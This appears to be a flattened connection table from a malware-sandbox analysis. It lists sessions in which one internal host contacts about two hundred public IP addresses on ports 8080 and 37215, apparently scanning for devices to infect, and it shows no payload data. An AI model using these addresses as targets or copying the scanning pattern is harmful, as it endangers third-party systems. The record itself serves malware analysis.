                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18879192.168.2.2354364118.33.254.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18880192.168.2.2338754194.208.21.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18881192.168.2.234455266.245.96.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18882192.168.2.23587822.202.217.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18883192.168.2.233891869.247.188.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18884192.168.2.2343372209.103.173.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18885192.168.2.235390692.108.212.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18886192.168.2.2350482161.139.123.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18887192.168.2.234047283.75.4.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18888192.168.2.233378695.235.145.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18889192.168.2.2352936175.220.100.1088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18890192.168.2.233737699.160.196.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18891192.168.2.2339896163.5.240.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18892192.168.2.235914070.68.156.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18893192.168.2.235626086.132.124.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18894192.168.2.2340362205.158.189.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18895192.168.2.233918825.193.43.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18896192.168.2.234321649.227.1.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18897192.168.2.2357398147.161.92.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18898192.168.2.2334948188.5.75.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18899192.168.2.2345578113.99.177.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18900192.168.2.2344888218.47.10.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18901192.168.2.233608295.213.185.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18902192.168.2.234113473.159.106.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18903192.168.2.2336010186.84.47.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18904192.168.2.2348672169.39.202.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18905192.168.2.2355908220.47.148.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18906192.168.2.2357780208.21.142.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18907192.168.2.2338848172.86.71.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18908192.168.2.236055853.22.46.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18909192.168.2.2332946161.137.74.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18910192.168.2.2351460185.5.125.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18911192.168.2.234874879.202.40.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18912192.168.2.234973688.138.187.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18913192.168.2.2359504140.238.152.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18914192.168.2.2341962101.230.90.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18915192.168.2.2334540188.222.185.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18916192.168.2.234667658.63.196.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18917192.168.2.2337830167.133.227.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18918192.168.2.2335284150.212.20.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18919192.168.2.235341881.122.82.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18920192.168.2.235154896.98.50.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18921192.168.2.235197076.195.188.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18922192.168.2.2346664218.148.139.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18923192.168.2.234945081.177.212.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18924192.168.2.2337070103.114.241.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18925192.168.2.2336414175.0.185.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18926192.168.2.2333640143.124.197.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18927192.168.2.234488236.233.232.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18928192.168.2.233690848.112.49.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18929192.168.2.2342208175.187.143.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18930192.168.2.235654095.61.183.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18931192.168.2.2351870203.225.31.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18932192.168.2.2341954145.81.22.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18933192.168.2.2356462112.92.79.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18934192.168.2.235677068.150.240.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18935192.168.2.2359382211.242.69.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18936192.168.2.233854836.32.91.2398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18937192.168.2.235584219.74.183.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18938192.168.2.2353628141.109.206.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18939192.168.2.2344998143.234.169.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18940192.168.2.234387457.68.55.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18941192.168.2.2344986197.42.87.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18942192.168.2.2335140147.70.206.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18943192.168.2.2340858209.106.199.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18944192.168.2.2337980148.251.27.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18945192.168.2.2358262183.15.5.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18946192.168.2.2334964198.157.49.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18947192.168.2.2336272102.188.245.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18948192.168.2.234542062.173.81.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18949192.168.2.2335368151.192.148.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18950192.168.2.234241835.2.90.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18951192.168.2.2342044117.208.89.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18952192.168.2.2352076161.15.5.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18953192.168.2.2343334197.105.214.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18954192.168.2.2348206118.208.53.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18955192.168.2.2353692150.233.60.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18956192.168.2.234657031.224.255.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18957192.168.2.2349742130.156.145.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18958192.168.2.2335282177.67.113.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18959192.168.2.2342238176.159.146.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18960192.168.2.234218042.182.31.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18961192.168.2.235756890.176.108.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18962192.168.2.234677238.52.253.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18963192.168.2.234405650.226.25.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18964192.168.2.2336484139.42.132.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18965192.168.2.2337466147.49.187.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18966192.168.2.234330288.9.11.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18967192.168.2.235498427.228.62.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18968192.168.2.235322051.35.43.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18969192.168.2.2336554108.190.124.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18970192.168.2.235403485.243.34.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18971192.168.2.234466248.202.180.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18972192.168.2.234071651.115.164.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18973192.168.2.2350098131.189.54.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18974192.168.2.2347308212.50.81.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18975192.168.2.233626451.195.157.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18976192.168.2.2357098108.134.70.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18977192.168.2.234242286.223.114.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18978192.168.2.2349352146.32.252.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18979192.168.2.235285889.183.41.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18980192.168.2.2353828135.6.164.1088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18981192.168.2.2356218213.13.125.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18982192.168.2.234223663.2.8.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18983192.168.2.2343460206.249.99.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18984192.168.2.2342762218.230.155.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18985192.168.2.233404662.203.185.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18986192.168.2.2342944171.96.104.2248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18987192.168.2.235839832.13.16.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18988192.168.2.2359786220.203.171.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18989192.168.2.235607457.106.117.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18990192.168.2.2346760205.92.69.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18991192.168.2.2354738136.81.168.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18992192.168.2.235493098.82.242.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18993192.168.2.234469439.249.217.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18994192.168.2.2346012159.243.92.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18995192.168.2.2333568202.147.12.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18996192.168.2.234905864.192.70.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18997192.168.2.233480298.219.205.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18998192.168.2.234327091.94.14.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18999192.168.2.2339628217.9.71.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19000192.168.2.234552479.188.109.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19001192.168.2.2338506178.82.87.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19002192.168.2.2337226160.123.178.2268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19003192.168.2.2340346200.113.219.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19004192.168.2.235777082.177.249.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19005192.168.2.23526301.43.72.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19006192.168.2.2346294151.84.100.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19007192.168.2.2339346130.41.161.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19008192.168.2.234980625.62.110.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19009192.168.2.233304835.140.72.2248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19010192.168.2.2360448100.139.71.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19011192.168.2.2356546173.190.175.2398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19012192.168.2.235362290.11.130.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19013192.168.2.233961238.7.229.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19014192.168.2.234316846.234.51.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19015192.168.2.2358582134.51.150.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19016192.168.2.234727899.240.233.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19017192.168.2.2333458114.80.30.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19018192.168.2.235235651.192.161.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19019192.168.2.2350830177.111.214.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19020192.168.2.233651432.58.135.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19021192.168.2.233341683.98.13.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19022192.168.2.2353662146.186.217.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19023192.168.2.235929652.193.158.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19024192.168.2.235775218.52.77.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19025192.168.2.2339408153.68.72.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19026192.168.2.233567054.195.134.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19027192.168.2.2333306182.92.43.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19028192.168.2.2360796117.226.187.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19029192.168.2.2357088141.93.48.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19030192.168.2.235424051.1.93.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19031192.168.2.2359134149.208.223.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19032192.168.2.234860625.215.215.1188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19033192.168.2.233888045.48.209.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19034192.168.2.233299420.51.27.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19035192.168.2.235011635.44.164.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19036192.168.2.234444279.43.242.2168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19037192.168.2.233621282.20.150.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19038192.168.2.2351924163.95.171.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19039192.168.2.2337328172.116.196.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19040192.168.2.2347086200.225.127.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19041192.168.2.2354698187.144.119.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19042192.168.2.235802224.192.30.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19043192.168.2.2355116131.243.152.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19044192.168.2.2347634201.80.187.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19045192.168.2.2334438109.5.2.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19046192.168.2.2344600108.43.138.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19047192.168.2.233783858.53.61.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19048192.168.2.2338650196.122.174.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19049192.168.2.235847845.136.49.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19050192.168.2.2337978105.43.49.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19051192.168.2.2351078168.246.72.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19052192.168.2.2336810207.207.42.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19053192.168.2.2338994202.235.26.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19054192.168.2.233943217.200.226.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19055192.168.2.235510880.152.172.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19056192.168.2.2340684197.16.46.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19057192.168.2.2344512207.119.79.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19058192.168.2.2340130168.237.89.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19059192.168.2.235915695.31.234.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19060192.168.2.235570219.37.70.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19061192.168.2.233757652.4.229.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19062192.168.2.233646859.4.148.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19063192.168.2.234637451.248.93.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19064192.168.2.2359512208.29.170.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19065192.168.2.2346238130.52.207.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19066192.168.2.2359998200.240.187.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19067192.168.2.2341876153.246.241.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19068192.168.2.2342274208.29.15.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19069192.168.2.2337156187.143.127.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19070192.168.2.2359336150.207.16.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19071192.168.2.233339043.108.124.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19072192.168.2.2346332198.107.212.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19073192.168.2.234655641.97.62.13237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19074192.168.2.2334934157.255.91.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19075192.168.2.2351500157.173.164.19337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19076192.168.2.235429278.56.115.5337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19077192.168.2.2359920197.229.211.19637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19078192.168.2.2337722197.155.27.18437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19079192.168.2.234856241.12.4.13937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19080192.168.2.234253842.154.223.14437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19081192.168.2.2335414197.80.10.18837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19082192.168.2.2347318157.142.214.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19083192.168.2.2352264197.22.243.21237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19084192.168.2.2334270188.228.86.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19085192.168.2.2333830197.110.117.18837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19086192.168.2.2335254197.117.77.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19087192.168.2.235508642.199.21.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19088192.168.2.2332838197.247.254.10137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
